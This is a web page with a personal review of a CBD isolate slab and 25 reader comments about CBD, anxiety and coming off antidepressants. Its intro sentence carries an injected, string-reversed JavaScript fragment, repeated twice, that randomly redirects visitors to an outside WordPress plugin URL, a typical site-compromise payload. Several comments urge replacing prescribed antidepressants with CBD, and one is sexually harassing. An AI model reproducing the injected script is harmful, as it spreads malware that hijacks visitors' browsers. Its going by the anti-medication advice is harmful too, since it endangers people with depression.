99% CBD Isolate Slab from CBDistillery – INTRO/PRODUCT REVIEW

Learn the basics of CBD, discover how it has helped me toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to wean off of anti-depressants, and find out how toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to use it for yourself!


— 99% CBD Isolate Slab
(Use coupon code ‘ogterpsauce’ for 5% off!)

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26 thoughts on “99% CBD Isolate Slab from CBDistillery – INTRO/PRODUCT REVIEW”

  1. Gibigiana says:

    Where did you purchase that rig? I want a simple to the point rig like that.

    Thanks, Andrew

  2. drewish drews says:

    hello. thank you for the review. how long do the effects last?

  3. Doge Jet says:

    Sam your review was absolutely amazing. Your story was very touching I just prayed for a quick complete recovery and transformation. I believe you will naturally grow out of the need for the pharms.. They should be paying you for this review. I guarantee if you keep up on a channel you will go viral. Subscribed from some random Internet dude –
    Edited by Nick in am time 🙂

  4. TheDmoney315 says:

    What kind of antidepressants were you taking? And did the CBD help you get off them?

  5. chris magan says:

    cbd is da bomb i been chain dabbin..really does even out being too stoned also

  6. Suh dude says:

    I'm 22 and have crippling anxiety shaking ect i odder some cbd and super excited to try it. Your video helped a lot thank you

  7. Mike says:

    how many doses do you get out of a gram of slab. in trying to get an idea of his much you use.

  8. Melvin Winters says:

    Biggest concerns I have with CBD are: 1. it is an unregulated market, so there is no product quality assurance. I saw a video of someone produce an extract of CBD with some sketchy chemicals that have no business in the human body. 2. The legality surrounding CBD is also sketchy. There is a chance you could face legal troubles from buying/consuming it. 3. How do you know the correct dose to take for the specific ailment you are trying to treat? Do you just take a big hit and hope for the best?

  9. HBDABFELLAS says:


  10. James Nelson says:

    Thank you for the video, it gave me some information that I was looking for. I got one question though. Any idea how long the effect of CBD seem to last?

  11. Oliver Huey North Coast Organic says:

    You are an incredible person! The way you took the subject and talked about in such an articulate way, with humility and in my opinion in a way that was very fair. Giving people the most honest opinion at the same time telling people so you could help them. I don't know what you do for a living or anything about you, your video just popped up for me to watch but in my opinion you have a fantastic way about you. With cbd being such a huge thing and so many people as you say don't know about it yet maybe this is a calling for you? To use your experience to help others. I know you said its early yet, your still finishing your last dose but maybe when you feel ready you might consider doing this? Maybe you have previous video i havnt checked so excuse me if im a tad late with my comment. The way you said about it helping you but didnt try and say it would help everyone. The way you said i am still learning, please research the topic for yourself. I just feel your genuineness shown through. I am very pleased you have come to where you are, sounds like you have made it through a difficult time. I am quite clued up on the subject myself and your video captured me. Obviously iv subbed your channel and like etc… You didnt even ask.. I like that too. But i really look forward to your next episode and hearing how your getting on. I will go and see if you have other vids now and watch them when i can. I gotto go.. Big thumbs up from me. Take care. Peace

  12. Blznstang says:

    I just order me some empire extracts empirewellness gunna try for my 1st time

  13. kekejojo1212 says:

    i understand your viewpoint but i feel like you still have some cognitive dissonance about drugs, especially antidepressants. it seems like a contradiction to say that a particular drug "saved your life" and then also say we should be avoiding all the "FDA approved crap". when you got on your medication you should have known the possible side effects. your doctor should have told you that you can have side effects, and every single pharmacy includes a long information sheet with every refill of your medication detailing exactly what can happen. not every drug is perfect and that's why there's more research being done all the time, but i think you need to give a little more credit to something if it truly "saved your life". also, anecdotal evidence does not replace actual scientific research. you said around 2:00 that "we are doing our own research" which is not true. anecdotal evidence is notoriously a bad way to go about deciding what is good and what isnt. double blind placebo controlled trials are the only known way to properly test something. you are making extremely bold claims especially for something that you are saying you have only used for a month as well as tapering off of drugs at the same time. you are probably getting less side effects from tapering off of the medication, and that complicates things further when you try to attribute positive effects to CBD. im not against CBD in any way at all, but i don't think it's "up to the people" and that it can replace research. people really love to bash "big pharma" because it isnt perfect but don't understand that they likely wouldn't be alive without it.

  14. Nuno Figueiredo says:

    You are very cute!! =)
    Very nice review, you explained it very clearly. Thanks for sharing your story, you gave me a lot of inspiration =)
    I wish you all the best. I hope that you win all the battles that you have. Again, you are very beautiful! Keep on going. I suggest that you find a good shaman, he'll surely help you with the various issues that you have.

  15. Parker Sky says:

    Powder or slab isolate?

  16. Kaine says:

    very useful and informative thank you

  17. Johnny Carrillo says:

    I have the same Slab from them but mine came in a plastic jar yours looks glass but it doesn't matter if love the stuff and I'm almost out,time to order more, great review

  18. Ryan says:

    I think your best medicine would be to sit on my face

  19. Kassandra Powow says:

    can you only get cbd in states it's recreational use only? I am just getting into cbd info I hate how my pills make me feel and want to start using cbd in my state it's only for medical use as of now

  20. koolguy4ya says:

    Turp Sauce
    Hello and I just came across your video. Just wanna say that I congratulate U on your Video. I notice other people who are taking CBD for their 1st time have also included a 1st time CBD user Video here on YouTube. Its a great way to get the word out & I also agree with your comment which is quite common, "If only we knew about this CBD sooner". Also, my question is, How many milligrams of CBD is in each container that U ordered & is there any THC in the ingredient? from what I've noticed, some online sites vary with their CBD. Some have 100% CBD w/3% THC or 100% CBDw/1% THC or just 100% CBD & no THC at all. Would also like to say Thank You for your Video & continue doing whats best 4 U. Who knows, maybe you'll be permanently off of those doctor perscribed medications for good & you'll jus keep investing in CBD products that are more productive than doctor perscribed medications. U have an awesome & great day out there & thanks again for you're video.

  21. Alex Pletcher says:

    Hey Sam, just wanted to let you know your link to the site isn't working properly. Also, I just ordered isolate crystal from CBD distillery as well.. looking forward to trying it.

  22. campbub says:

    Wow amazing!!

    Such a blessing!

    I've been getting into cbds more and more ( about 5 years now)

    I don't do to well with high thc.

    My gut has been telling me cbd since I started this journey.. but back 5 years ago, finding it was tuff, and most of it was super diluted, and high price..

    I'm super excited to try a gram from cbd distillery .. they seem to be vary legit, with price, amount , and lab testing.

    Thanks for sharing your journey … cbd is gonna change the medical community.

    Cbd distillery should be hooking you up for such an honest review -testimony

  23. Neon_Midnight_Sky says:

    just found you're channel and great review. I'm very similar in regards to your story. I've been on anti-depressants and anti-anxiety medications before but I really feel like they've never worked. I've always wanted to try CBD for a while now so I just ordered some oil; fingers crossed to see if it can alleviate my symptoms, I've heard great things. anyways great review keep the good work going your just earned a sub. 🙂

  24. Mavric7788 says:

    I love dabbing cbd also ur very pretty

  25. Little E On The Fly says:

    I agree. I feel like antidepressents is a problem. It's something i believe is over prescribed. I was prescribed very young when it was just typical teen stuff. As a teen you believe anything. When they switched me to effexor xr at 25 i had the same withdrawl problems after 24 hours. i dont have that problem with cbd. If i go without for anytime, I do not withdrawl or have worse anxiety. Chemicals change your brain, and can pull diseases hiding in your genes. Coincidentally I have major issues with fibro now like my mother whom passed from cancer they overlooked. Theres a problem with pharma for sure. Some things are life saving like things keeping you alive like heart medication. Antidepressants, pain meds, and benzos should make you better not worse. You go girl!

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